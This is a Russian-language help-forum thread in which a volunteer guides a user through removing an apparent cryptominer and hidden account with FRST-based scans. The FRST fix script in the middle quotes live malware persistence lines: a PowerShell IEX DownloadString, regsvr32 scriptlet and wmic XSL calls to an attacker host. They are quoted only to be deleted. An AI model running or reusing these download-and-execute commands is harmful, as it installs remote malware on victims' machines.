Вероятный майнер по имени John

@Aexd · Регистрация: 28.12.2021

Author24 — интернет-сервис помощи студентам

Как вы могли догадаться из названия я совершенно случайно обнаружил ещё одного скрытого пользователя своей системы:

Имя устройства LAPTOP-SR6R18LC
Процессор Intel(R) Core(TM) i5-10210U CPU @ 1.60GHz 2.11 GHz
Оперативная память 8,00 ГБ (доступно: 7,84 ГБ)
Тип системы 64-разрядная операционная система, процессор x64
Выпуск Windows 10 Домашняя для одного языка
Версия 20H2
Дата установки ‎07.‎08.‎2021
Сборка ОС 19042.1415
Взаимодействие Windows Feature Experience Pack 120.2212.3920.0

По имени John который обладал правами удалённого доступа. Не долго думая ,удалив его через Выполнить , решил убедиться в своих подозрениях и попал на ваш сайт где описан похожий случай. Решил последовать вашим инструкциям и создать тему по этому поводу. К слову вирус никак себя не выдаёт, процессы не висят. Единственное что при попытке зайти на ваш сайт через браузер Edge - браузер вылетал, уж не знаю связанно это или нет. Сейчас сижу через яндекс. В общем логи приложил. Дайте знать что это и что с этим делать. Я право не в силах бороться на равных с этой электроникой.

@thyrex · 28.12.2021, 23:28

Скачайте AV block remover.
Распакуйте, запустите и следуйте инструкциям. Если не запускается, переименуйте файл AVbr.exe в, например, AV_br.exe
В результате работы утилиты появится отчёт AV_block_remove_дата-время.log, прикрепите его к следующему сообщению.

После перезагрузки системы соберите новый CollectionLog Автологером.

@Aexd · 29.12.2021, 00:26 **[ТС]**

Я вынужден извиниться, ведь выполнить подобные манипуляции не представляется возможным. Даже при переименовании программа не ставится. Система говорит что там вирус или вредоносная программа и удаляет его.

@Aexd · 29.12.2021, 00:50 **[ТС]**

-->

@thyrex · 29.12.2021, 01:22

Нет там вируса. Отключите параноидального Защитника Windows хотя бы на время лечения.

@Aexd · 29.12.2021, 01:49 **[ТС]**

Мой косяк. На 10 винде столько служб по защите появилось что черт ногу сломит , а защиты всё равно ноль.

@Aexd · 29.12.2021, 01:51 **[ТС]**

-->

@thyrex · 29.12.2021, 01:54

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.

1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
2. Убедитесь, что в окне Optional Scan (Дополнительные опции) отмечены List BCD и 90 Days Files.
3. Нажмите кнопку Scan (Сканировать).
4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа.
5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt).
6. Файлы FRST.txt и Addition.txt заархивируйте (в один общий архив) и прикрепите к сообщению.

@Aexd · 29.12.2021, 02:04 **[ТС]**

Готово

@Aexd · 29.12.2021, 02:32 **[ТС]**

Ну по ощущениям уже что то изменилось. Раньше шумел вентиляторами как вертолёт , а щас вдруг притих. Я думал так и должно быть) Ан нет. Видно что то с торрентов подцепил ещё пару месяцев назад. Ну что за погань....нет чтобы честным пиратством заниматься.)

Добавлено через 11 минут
Сестре купили ноут. Решил потестить немного. Ну всё как обычно в общем.)

@thyrex · 29.12.2021, 07:09

1. Выделите следующий код и скопируйте в буфер обмена (правая кнопка мыши – Копировать)

Код

Start::
CreateRestorePoint:
HKLM-x32\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.ha7455h6fi1.net:280/v1.sct scrobj.dll (Нет файла) <==== ВНИМАНИЕ
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ограничение <==== ВНИМАНИЕ
WMI:subscription\CommandLineEventConsumer->topk4::[CommandLineTemplate => cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.ha7455h6fi1.net:8080/power.txt')||regsvr32 /u /s /i:http://ha7455h6fi1.net:8080/s.txt scrobj.dll&wmic os get /FORMAT:"http://wmi.ha7455h6fi1.net:8220/s.xsl"]
Reboot:
End::

2. Запустите Farbar Recovery Scan Tool от имени Алминистратора по правой кнопке мыши.
3. Нажмите один раз на кнопку Fix (Исправить) и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

Обратите внимание: будет выполнена перезагрузка компьютера.

@Aexd · 29.12.2021, 14:25 **[ТС]**

Готово

@Aexd · 29.12.2021, 14:52 **[ТС]**

Откуда пришла эта зараза можно выяснить? И посоветуете антивирус какой?

@thyrex · 29.12.2021, 19:53

Сообщение от Aexd

Откуда пришла эта зараза можно выяснить?

Не представляется возможным, но наверняка с каким-нибудь кряком, кейгеном и т.п.

Проблема решена?

Загрузите SecurityCheck by glax24 & Severnyj и сохраните утилиту на Рабочем столе.

Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/10);
Если увидите предупреждение от вашего фаервола относительно программы SecurityCheck, не блокируйте ее работу;
Дождитесь окончания сканирования, откроется лог в Блокноте с именем SecurityCheck.txt;
Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt;
Прикрепите этот файл в своем следующем сообщении.

@Aexd · 29.12.2021, 20:10 **[ТС]**

Проблема решена?

Да, в общем да. Больше не греется и не шумит как последние пару месяцев. Ну можно сказать поработал в стресс режиме. Ничего не сгорело и не отвалилось.Тест прошёл успешно)

@Aexd · 29.12.2021, 20:24 **[ТС]**

Если на этом всё, то хочу от души поблагодарить за вашу оперативную подмогу и знания. Респект администрации сайта и подобным ресурсам за вклад в борьбу со злым умыслом и спасения каждого из людей встретившего проблемы в этой сфере в частности и всего мира в общности.

@thyrex · 29.12.2021, 22:58

------------------------------- [ Browser ] -------------------------------
Opera Stable 82.0.4227.23 v.82.0.4227.23 Внимание! Скачать обновления
^Проверьте обновления через меню О программе!^
Opera 11.00 v.11.00.1156 Внимание! Скачать обновления
Yandex (All Users) v.21.11.4.727 Внимание! Скачать обновления
^Проверьте обновления через меню Дополнительно - О браузере Yandex!^
---------------------------- [ UnwantedApps ] -----------------------------
Кнопка "Яндекс" на панели задач v.2.2.1.54 Внимание! Приложение распространяется в рамках партнерских программ и сборников-бандлов. Рекомендуется деинсталляция. Возможно Вы стали жертвой обмана или социальной инженерии.
Driver Easy 5.7.0.39448 v.5.7.0.39448 Внимание! Подозрение на демо-версию антишпионской программы, программу для обновления драйверов, программу-оптимизатор или программу очистки реестра. Рекомендуется деинсталляция и сканирование ПК с помощью Malwarebytes Anti-Malware. Возможно Вы стали жертвой обмана или социальной инженерии.

Исправляйте указанное + Рекомендации после удаления вредоносного ПО

@Aexd · 30.12.2021, 01:26 **[ТС]**

Спасибо вам.. Всех благ и всего самого наилучшего в новом году. С наступающим.

@Aexd 0 / 0 / 0 Регистрация: 28.12.2021 Сообщений: 12
	29.12.2021, 14:52 [ТС]	13
	Откуда пришла эта зараза можно выяснить? И посоветуете антивирус какой? 0

@Aexd 0 / 0 / 0 Регистрация: 28.12.2021 Сообщений: 12
	29.12.2021, 20:24 [ТС]	16
	Если на этом всё, то хочу от души поблагодарить за вашу оперативную подмогу и знания. Респект администрации сайта и подобным ресурсам за вклад в борьбу со злым умыслом и спасения каждого из людей встретившего проблемы в этой сфере в частности и всего мира в общности. 0

@thyrex 13265 / 7389 / 1564 Регистрация: 06.09.2009 Сообщений: 26,953
	29.12.2021, 22:58	17
	------------------------------- [ Browser ] ------------------------------- Opera Stable 82.0.4227.23 v.82.0.4227.23 Внимание! Скачать обновления ^Проверьте обновления через меню О программе!^ Opera 11.00 v.11.00.1156 Внимание! Скачать обновления Yandex (All Users) v.21.11.4.727 Внимание! Скачать обновления ^Проверьте обновления через меню Дополнительно - О браузере Yandex!^ ---------------------------- [ UnwantedApps ] ----------------------------- Кнопка "Яндекс" на панели задач v.2.2.1.54 Внимание! Приложение распространяется в рамках партнерских программ и сборников-бандлов. Рекомендуется деинсталляция. Возможно Вы стали жертвой обмана или социальной инженерии. Driver Easy 5.7.0.39448 v.5.7.0.39448 Внимание! Подозрение на демо-версию антишпионской программы, программу для обновления драйверов, программу-оптимизатор или программу очистки реестра. Рекомендуется деинсталляция и сканирование ПК с помощью Malwarebytes Anti-Malware. Возможно Вы стали жертвой обмана или социальной инженерии. Исправляйте указанное + Рекомендации после удаления вредоносного ПО 0

@thyrex 13265 / 7389 / 1564 Регистрация: 06.09.2009 Сообщений: 26,953
	28.12.2021, 23:28	2
	Скачайте AV block remover. Распакуйте, запустите и следуйте инструкциям. Если не запускается, переименуйте файл AVbr.exe в, например, AV_br.exe В результате работы утилиты появится отчёт AV_block_remove_дата-время.log, прикрепите его к следующему сообщению. После перезагрузки системы соберите новый CollectionLog Автологером. 0

@Aexd 0 / 0 / 0 Регистрация: 28.12.2021 Сообщений: 12
	29.12.2021, 00:26 [ТС]	3
	Я вынужден извиниться, ведь выполнить подобные манипуляции не представляется возможным. Даже при переименовании программа не ставится. Система говорит что там вирус или вредоносная программа и удаляет его. 0

@Aexd 0 / 0 / 0 Регистрация: 28.12.2021 Сообщений: 12
	29.12.2021, 00:50 [ТС]	4
	--> Миниатюры 0

@thyrex 13265 / 7389 / 1564 Регистрация: 06.09.2009 Сообщений: 26,953
	29.12.2021, 01:22	5
	Нет там вируса. Отключите параноидального Защитника Windows хотя бы на время лечения. 0

@Aexd 0 / 0 / 0 Регистрация: 28.12.2021 Сообщений: 12
	29.12.2021, 01:49 [ТС]	6
	Мой косяк. На 10 винде столько служб по защите появилось что черт ногу сломит , а защиты всё равно ноль. 0

@thyrex 13265 / 7389 / 1564 Регистрация: 06.09.2009 Сообщений: 26,953
	29.12.2021, 01:54	8
	Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе. Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе. 1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением. 2. Убедитесь, что в окне Optional Scan (Дополнительные опции) отмечены List BCD и 90 Days Files. 3. Нажмите кнопку Scan (Сканировать). 4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. 5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt). 6. Файлы FRST.txt и Addition.txt заархивируйте (в один общий архив) и прикрепите к сообщению. 0

@Aexd 0 / 0 / 0 Регистрация: 28.12.2021 Сообщений: 12
	29.12.2021, 02:32 [ТС]	10
	Ну по ощущениям уже что то изменилось. Раньше шумел вентиляторами как вертолёт , а щас вдруг притих. Я думал так и должно быть) Ан нет. Видно что то с торрентов подцепил ещё пару месяцев назад. Ну что за погань....нет чтобы честным пиратством заниматься.) Добавлено через 11 минут Сестре купили ноут. Решил потестить немного. Ну всё как обычно в общем.) 0

@thyrex 13265 / 7389 / 1564 Регистрация: 06.09.2009 Сообщений: 26,953
	29.12.2021, 07:09	11
	1. Выделите следующий код и скопируйте в буфер обмена (правая кнопка мыши – Копировать) Код Start:: CreateRestorePoint: HKLM-x32\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.ha7455h6fi1.net:280/v1.sct scrobj.dll (Нет файла) <==== ВНИМАНИЕ HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ограничение <==== ВНИМАНИЕ WMI:subscription\CommandLineEventConsumer->topk4::[CommandLineTemplate => cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.ha7455h6fi1.net:8080/power.txt')\|\|regsvr32 /u /s /i:http://ha7455h6fi1.net:8080/s.txt scrobj.dll&wmic os get /FORMAT:"http://wmi.ha7455h6fi1.net:8220/s.xsl"] Reboot: End:: 2. Запустите Farbar Recovery Scan Tool от имени Алминистратора по правой кнопке мыши. 3. Нажмите один раз на кнопку Fix (Исправить) и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении. Обратите внимание: будет выполнена перезагрузка компьютера. 0

@thyrex 13265 / 7389 / 1564 Регистрация: 06.09.2009 Сообщений: 26,953
	29.12.2021, 19:53	14
	Сообщение от Aexd Откуда пришла эта зараза можно выяснить? Не представляется возможным, но наверняка с каким-нибудь кряком, кейгеном и т.п. Проблема решена? Загрузите SecurityCheck by glax24 & Severnyj и сохраните утилиту на Рабочем столе. Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/10); Если увидите предупреждение от вашего фаервола относительно программы SecurityCheck, не блокируйте ее работу; Дождитесь окончания сканирования, откроется лог в Блокноте с именем SecurityCheck.txt; Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt; Прикрепите этот файл в своем следующем сообщении. 0

@Aexd 0 / 0 / 0 Регистрация: 28.12.2021 Сообщений: 12
	30.12.2021, 01:26 [ТС]	18
	Спасибо вам.. Всех благ и всего самого наилучшего в новом году. С наступающим. 0

Опции темы